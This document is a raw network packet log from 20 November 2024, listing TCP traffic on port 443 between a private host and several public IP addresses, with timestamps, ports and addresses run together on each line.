                                                                                                                                                                                              Nov 20, 2024 21:28:16.193551064 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.193620920 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.204832077 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.215405941 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.215421915 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.215444088 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.215483904 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.215492964 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.215534925 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.228235960 CET49731443192.168.2.54.175.87.197
                                                                                                                                                                                              Nov 20, 2024 21:28:16.228319883 CET443497314.175.87.197192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.228415966 CET49731443192.168.2.54.175.87.197
                                                                                                                                                                                              Nov 20, 2024 21:28:16.230552912 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.230576992 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.230595112 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.230628967 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.230628014 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.230654955 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.230659008 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.230705023 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.232778072 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.232804060 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.232839108 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.232846022 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.232886076 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.233361006 CET49731443192.168.2.54.175.87.197
                                                                                                                                                                                              Nov 20, 2024 21:28:16.233391047 CET443497314.175.87.197192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.245632887 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.245662928 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.245707035 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.245723009 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.245753050 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.245774984 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.253210068 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.253247023 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.253278971 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.253292084 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.253344059 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.273473024 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.273505926 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.273547888 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.273560047 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.273612022 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.292514086 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.292547941 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.292608023 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.292617083 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.292665005 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.296668053 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.296694040 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.296737909 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.296747923 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.296780109 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.296802044 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.310606003 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.310642004 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.310678959 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.310689926 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.310725927 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.324976921 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.325007915 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.325046062 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.325053930 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.325089931 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.338761091 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.338802099 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.338844061 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.338855028 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.338901043 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.345804930 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.345837116 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.345868111 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.345875978 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.345923901 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.345931053 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.345969915 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.353461027 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.353491068 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.353532076 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.353538036 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.353579044 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.361136913 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.361166000 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.361202002 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.361217976 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.361244917 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.361283064 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.361288071 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.367763042 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.367801905 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.367832899 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.367839098 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.367872953 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.375860929 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.375890970 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.375919104 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.375926018 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.375968933 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.375974894 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.376024008 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.382438898 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.382483959 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.382503986 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.382509947 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.382544994 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.382560968 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.390149117 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.390182018 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.390221119 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.390227079 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.390254974 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.390278101 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.390288115 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.398096085 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.398128033 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.398161888 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.398166895 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.398214102 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.407686949 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.407712936 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.407747984 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.407754898 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.407798052 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.423212051 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.423248053 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.423266888 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.423296928 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.423305035 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.423321009 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.423333883 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.423377991 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.423381090 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.423398018 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.423405886 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.423413992 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.423415899 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.423413992 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.423454046 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.423470974 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.423470974 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.423494101 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.424367905 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.424400091 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.424432039 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.424439907 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.424470901 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.430951118 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.430980921 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.431008101 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.431015015 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.431042910 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.431124926 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.431170940 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.432373047 CET49716443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.432389975 CET44349716141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.459289074 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.459336996 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.459383965 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.459393024 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.459429979 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.459448099 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.469806910 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.469835997 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.469887018 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.469899893 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.469929934 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.469949961 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.478338003 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.478380919 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.478419065 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.478426933 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.478463888 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.478483915 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.500016928 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.500050068 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.500102997 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.500137091 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.500158072 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.500180960 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.607492924 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.607518911 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.607583046 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.607614040 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.607634068 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.607657909 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.615811110 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.615833044 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.615895987 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.615910053 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.615938902 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.615961075 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.617587090 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.617645979 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.632189035 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.632206917 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.632251978 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.632261038 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.632291079 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.632314920 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.648298025 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.648318052 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.648484945 CET44349725141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.648507118 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.648519039 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.648607969 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.649322987 CET49725443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.649359941 CET44349725141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.649884939 CET44349725141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.652322054 CET49725443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.652431965 CET44349725141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.652611971 CET49725443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.653928995 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.654002905 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.654047012 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.654076099 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.654108047 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.662168026 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.662185907 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.662298918 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.662319899 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.662458897 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.672748089 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.672777891 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.673346043 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.673381090 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.678529024 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.678548098 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.678752899 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.678767920 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.678864956 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.680521965 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.680567980 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.681585073 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.681585073 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.691725969 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.691745043 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.692336082 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.692368031 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.694459915 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.694698095 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.694708109 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.697458029 CET49725443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.697518110 CET44349725141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.731986046 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.732037067 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.732696056 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.733938932 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.733980894 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.734077930 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.734930992 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.734931946 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.734946966 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.734951973 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.735369921 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.735379934 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.735558987 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.735820055 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.735832930 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.737344027 CET49735443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.737355947 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.737803936 CET49735443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.738202095 CET49736443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.738236904 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.738403082 CET49735443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.738415956 CET49736443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.738456011 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.741720915 CET49736443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.741748095 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.742854118 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.817994118 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.818021059 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.818232059 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.818252087 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.818439960 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.827406883 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.827518940 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.827534914 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.843755007 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.843771935 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.844460964 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.844479084 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.859906912 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.859921932 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.860124111 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.860142946 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.873925924 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.873939991 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.874558926 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.874578953 CET4434972013.227.8.5192.168.2.5
